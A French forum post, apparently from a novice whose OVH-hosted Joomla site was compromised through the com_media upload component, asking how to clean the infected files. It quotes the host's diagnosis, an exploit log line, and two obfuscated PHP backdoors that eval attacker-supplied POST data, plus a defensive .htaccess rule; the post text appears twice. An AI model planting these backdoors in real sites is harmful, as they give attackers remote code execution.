Tweet
Bonjour,
j'ai un site hebergé chez ovh hacké il y a quelques jours. J'ai remonté une sauvegarde saine, mais il est retombé. Ovh me dit dans son diagnostic que des fichiers PHP ont été modifiés pour inclure une entête contenant du code PHP malveillant et joignent une liste impressionante de fichiers en annexe.
Apparemment la faille viendrait du composant com_media:
Voici*des*exemples*de*logs*montrant*l'exécution*de *cette*faille.
175.45.196.212*www.zefoneworld.com***[29/Dec/2014:02:56:55*+0100]*"POST*/administrator/index.php?
option=com_media&task=file.upload&tmpl=component&1 9c6d76bee7d9d7872a0496c6075b2dd=7173223d0ed51a2d72
a7262ad30e67df&42844c99d41735816a28ed94c3fd9c7f=1& format=html*HTTP/1.1"*303***
"http://www.zefoneworld.com/administrator/index.php?option=com_media"*"Mozilla/5.0*(Windows*NT*5.1)*
AppleWebKit/537.36*(KHTML,*like*Gecko)*Chrome/33.0.1750.154*Safari/537.36"
Exemple de code malveillant décelé
<?php
$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['ncdd94a'])) {eval($s21(${$s20}['ncdd94a']));}?>
<?php
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q760097'])){eval(${$s20}['q760097']);}?>
On me dit ensuite;
Dans*le*but*de*remettre*votre*site*fonctionnel,*il *faudrait*à*votre*niveau*procéder*à*la*suppression *du*code*malveillant*dans*vos*fichiers.
Je*vous*invite*également*à*placer*un*fichier*.htac cess*dans*le*dossier*wp*content/uploads/*contenant
les*lignes*ci*dessous:
<Files**.php>
Deny*from*all
</Files>
Ok pour le fichier .htaccess, mais supprimer le code malveillant dans les fichiers signifie nettoyer les 3 pages de fichiers en annexe, a savoir remplacer les fichiers endommagés par les mêmes mais sains (a savoir une sauvegarde) ou de reinstaller les modules actualisés ?
Désolé si les questions vous paraissent idiotes, mais je suis un peu nouveau dans tout ça et mes connaissances sont très limitées..
Merci pour votre aide
j'ai un site hebergé chez ovh hacké il y a quelques jours. J'ai remonté une sauvegarde saine, mais il est retombé. Ovh me dit dans son diagnostic que des fichiers PHP ont été modifiés pour inclure une entête contenant du code PHP malveillant et joignent une liste impressionante de fichiers en annexe.
Apparemment la faille viendrait du composant com_media:
Voici*des*exemples*de*logs*montrant*l'exécution*de *cette*faille.
175.45.196.212*www.zefoneworld.com***[29/Dec/2014:02:56:55*+0100]*"POST*/administrator/index.php?
option=com_media&task=file.upload&tmpl=component&1 9c6d76bee7d9d7872a0496c6075b2dd=7173223d0ed51a2d72
a7262ad30e67df&42844c99d41735816a28ed94c3fd9c7f=1& format=html*HTTP/1.1"*303***
"http://www.zefoneworld.com/administrator/index.php?option=com_media"*"Mozilla/5.0*(Windows*NT*5.1)*
AppleWebKit/537.36*(KHTML,*like*Gecko)*Chrome/33.0.1750.154*Safari/537.36"
Exemple de code malveillant décelé
<?php
$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['ncdd94a'])) {eval($s21(${$s20}['ncdd94a']));}?>
<?php
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q760097'])){eval(${$s20}['q760097']);}?>
On me dit ensuite;
Dans*le*but*de*remettre*votre*site*fonctionnel,*il *faudrait*à*votre*niveau*procéder*à*la*suppression *du*code*malveillant*dans*vos*fichiers.
Je*vous*invite*également*à*placer*un*fichier*.htac cess*dans*le*dossier*wp*content/uploads/*contenant
les*lignes*ci*dessous:
<Files**.php>
Deny*from*all
</Files>
Ok pour le fichier .htaccess, mais supprimer le code malveillant dans les fichiers signifie nettoyer les 3 pages de fichiers en annexe, a savoir remplacer les fichiers endommagés par les mêmes mais sains (a savoir une sauvegarde) ou de reinstaller les modules actualisés ?
Désolé si les questions vous paraissent idiotes, mais je suis un peu nouveau dans tout ça et mes connaissances sont très limitées..
Merci pour votre aide
Commentaire